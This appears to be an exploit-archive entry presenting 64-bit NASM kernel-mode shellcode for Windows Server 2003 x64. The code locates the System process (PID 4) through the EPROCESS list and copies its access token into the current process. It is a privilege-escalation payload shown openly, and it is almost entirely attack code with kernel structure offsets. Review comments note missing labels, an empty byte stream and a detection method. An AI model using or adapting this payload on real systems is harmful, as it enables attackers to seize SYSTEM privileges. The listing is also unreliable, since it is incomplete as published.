win2003/x64 - Token Stealing shellcode - 59 bytes

Reporter Fitzl Csaba
Modified 2015-08-20T00:00:00


Exploit for win64 platform in category shellcode

                                            ;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit
;important structures and offsets;
;kd> dt -r1 nt!_TEB
;   +0x110 SystemReserved1  : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
;kd> dt -r1 nt!_KTHREAD
;   +0x048 ApcState         : _KAPC_STATE
;     +0x000 ApcListHead      : [2] _LIST_ENTRY
;     +0x020 Process          : Ptr64 _KPROCESS
;kd> dt -r1 nt!_EPROCESS
;   +0x0d8 UniqueProcessId  : Ptr64 Void
;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
;     +0x000 Flink            : Ptr64 _LIST_ENTRY
;     +0x008 Blink            : Ptr64 _LIST_ENTRY
;   +0x160 Token            : _EX_FAST_REF
;     +0x000 Object           : Ptr64 Void
;     +0x000 RefCnt           : Pos 0, 4 Bits
;     +0x000 Value            : Uint8B
;-----------------------------------------------------------------------
; Purpose: kernel-mode payload that overwrites the current process's
;          EPROCESS.Token with the value held by the process whose
;          UniqueProcessId is 4 (System).
; Syntax:  NASM, 64-bit.
; Clobb:   rax, rcx, rdx, r9, flags
;
; Review notes:
;  - Every offset used here (0x188, 0x68, 0xd8, 0xe0, 0x160) is hard-coded
;    for the Windows Server 2003 x64 structure layout dumped in the header
;    comments. On a build with a different layout the same instructions
;    read and write unrelated fields.
;  - NOTE(review): the header derives 0x188 from nt!_TEB. In kernel mode
;    gs normally addresses the KPCR, so 0x188 is presumably
;    KPCR.Prcb (+0x180) + KPRCB.CurrentThread (+0x008) -- confirm with
;    "dt nt!_KPCR" / "dt nt!_KPRCB" on the target build.
;  - The listing exports `start` and branches to `find_system_process`,
;    but neither label is defined in the text shown, so it is incomplete
;    as published.
;  - The token is copied as a raw _EX_FAST_REF value, including the low
;    4 RefCnt bits; no reference is taken on the token object.
;  - For triage: after this runs, the modified process's Token field holds
;    the value read from PID 4. Comparing EPROCESS.Token across processes
;    (with the low 4 RefCnt bits masked off) in a memory image or kernel
;    debugger exposes a non-System process sharing the System token.
;-----------------------------------------------------------------------
global start
section .text
mov     rax, [gs:0x188]         ;rax = current thread (KTHREAD/ETHREAD) pointer
mov     rax, [rax+0x68]         ;rax = KTHREAD.ApcState.Process (0x48+0x20) = current EPROCESS
mov     rcx, rax                ;rcx = current EPROCESS, kept as the write target
mov     rax, [rax+0xe0]         ;rax = ActiveProcessLinks.Flink (points into the next EPROCESS)
sub     rax, 0xe0               ;Step back from the list entry to the start of that EPROCESS
mov     r9 , [rax+0xd8]         ;r9 = UniqueProcessId of the candidate process
cmp     r9 , 0x4                ;Compare against the System PID (=4)
jnz short find_system_process   ;Not System: go to the next EPROCESS (label not defined in this listing)
mov     rdx, [rax+0x160]        ;rdx = System process Token (_EX_FAST_REF value)
mov     [rcx+0x160], rdx        ;Overwrite the current process's Token with it
retn    0x10                    ;Return and release 0x10 bytes of stack; NOTE(review): presumably matches the call site this was written for, which the listing does not show
;byte stream:

